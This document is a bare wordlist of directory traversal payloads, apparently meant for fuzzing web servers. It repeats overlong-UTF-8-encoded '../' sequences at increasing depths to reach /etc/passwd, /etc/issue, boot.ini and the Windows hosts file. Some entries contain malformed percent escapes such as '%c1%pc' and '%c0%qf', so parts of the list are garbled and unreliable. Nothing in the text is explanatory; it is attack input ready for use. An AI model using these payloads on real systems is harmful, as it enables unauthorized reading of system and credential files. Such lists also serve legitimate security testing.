-%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cpasswd -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cissue -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cboot.ini -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cpasswd -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cissue -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cboot.ini -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cpasswd -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cissue -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cboot.ini -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cpasswd -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cissue -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cboot.ini -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%5e%c0%5e%c1%9cetc%c1%9cpasswd -%c0%5e%c0%5e%c1%9cetc%c1%9cissue -%c0%5e%c0%5e%c1%9cboot.ini -%c0%5e%c0%5e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cpasswd -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cissue -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cboot.ini -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cpasswd -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cissue -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cboot.ini -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cpasswd -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cissue -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cboot.ini -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cpasswd -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cissue -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cboot.ini -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cpasswd -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cetc%c1%9cissue -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cboot.ini -%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9c%c0%5e%c0%5e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%5e%c0%5e%c1%pcetc%c1%pcpasswd -%c0%5e%c0%5e%c1%pcetc%c1%pcissue -%c0%5e%c0%5e%c1%pcboot.ini -%c0%5e%c0%5e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcpasswd -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcissue -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcboot.ini -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcpasswd -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcissue -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcboot.ini -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcpasswd -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcissue -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcboot.ini -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcpasswd -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcissue -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcboot.ini -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcpasswd -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcetc%c1%pcissue -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcboot.ini -%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pc%c0%5e%c0%5e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%5e%c0%5e%c0%9vetc%c0%9vpasswd -%c0%5e%c0%5e%c0%9vetc%c0%9vissue -%c0%5e%c0%5e%c0%9vboot.ini -%c0%5e%c0%5e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vpasswd -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vissue -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vboot.ini -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vpasswd -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vissue -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vboot.ini -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vpasswd -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vissue -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vboot.ini -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vpasswd -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vissue -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vboot.ini -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vpasswd -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vetc%c0%9vissue -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vboot.ini -%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9v%c0%5e%c0%5e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%5e%c0%5e%c0%qfetc%c0%qfpasswd -%c0%5e%c0%5e%c0%qfetc%c0%qfissue -%c0%5e%c0%5e%c0%qfboot.ini -%c0%5e%c0%5e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfpasswd -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfissue -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfboot.ini -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfpasswd -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfissue -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfboot.ini -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfpasswd -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfissue -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfboot.ini -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfpasswd -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfissue -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfboot.ini -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfpasswd -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfetc%c0%qfissue -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfboot.ini -%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%5e%c0%5e%c1%8setc%c1%8spasswd -%c0%5e%c0%5e%c1%8setc%c1%8sissue -%c0%5e%c0%5e%c1%8sboot.ini -%c0%5e%c0%5e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8spasswd -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8sissue -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8sboot.ini -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8spasswd -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8sissue -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8sboot.ini -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8spasswd -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8sissue -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8sboot.ini -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8spasswd -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8sissue -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8sboot.ini -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8spasswd -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8setc%c1%8sissue -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8sboot.ini -%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8s%c0%5e%c0%5e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%5e%c0%5e%c1%1cetc%c1%1cpasswd -%c0%5e%c0%5e%c1%1cetc%c1%1cissue -%c0%5e%c0%5e%c1%1cboot.ini -%c0%5e%c0%5e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cpasswd -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cissue -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cboot.ini -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cpasswd -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cissue -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cboot.ini -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cpasswd -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cissue -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cboot.ini -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cpasswd -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cissue -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cboot.ini -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cpasswd -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cetc%c1%1cissue -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cboot.ini -%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1c%c0%5e%c0%5e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%5e%c0%5e%c1%afetc%c1%afpasswd -%c0%5e%c0%5e%c1%afetc%c1%afissue -%c0%5e%c0%5e%c1%afboot.ini -%c0%5e%c0%5e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afpasswd -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afissue -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afboot.ini -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afpasswd -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afissue -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afboot.ini -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afpasswd -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afissue -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afboot.ini -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afpasswd -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afissue -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afboot.ini -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afpasswd -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afissue -%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afboot.ini 